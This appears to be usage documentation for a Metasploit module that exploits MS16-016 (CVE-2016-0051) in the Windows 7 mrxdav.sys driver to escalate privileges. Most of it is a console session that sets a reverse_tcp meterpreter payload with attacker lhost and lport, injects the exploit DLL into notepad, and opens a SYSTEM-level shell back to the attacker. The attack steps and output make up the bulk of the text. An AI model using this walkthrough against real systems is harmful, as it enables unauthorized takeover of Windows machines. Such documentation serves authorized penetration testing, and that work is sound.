## Intro

This module exploits a null pointer dereference vulnerability present in the mrxdav.sys kernel driver on Windows 7 x86.  The vulnerability is described by MS16-016 and CVE-2016-0051.  The module allows the user to spawn a new payload, such as meterpreter, on the target system with elevated privileges (NT AUTHORITY\SYSTEM)

## Usage

You'll first need to obtain a session on the target system.  Next, once the module is loaded, one simply needs to set the ```payload``` and ```session``` options.  From here, running the module will result in the payload being executed with system level privileges.

An example session follows:


```
meterpreter > background
[*] Backgrounding session 5...
msf exploit(handler) > use exploits/windows/local/ms16_016_webdav
msf exploit(ms16_016_webdav) > set session 5
session => 5
msf exploit(ms16_016_webdav) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms16_016_webdav) > set lport 4567
lport => 4567
msf exploit(ms16_016_webdav) > set lhost 192.168.1.203
lhost => 192.168.1.203
msf exploit(ms16_016_webdav) > run

[*] Started reverse TCP handler on 192.168.1.203:4567
[*] Launching notepad to host the exploit...
[+] Process 3204 launched.
[*] Reflectively injecting the exploit DLL into 3204...
[*] Exploit injected ... injecting payload into 3204...
[*] Sending stage (957999 bytes) to 192.168.1.221
[*] Done.  Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.
[*] Meterpreter session 12 opened (192.168.1.203:4567 -> 192.168.1.221:49266) at 2016-07-05 22:07:34 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```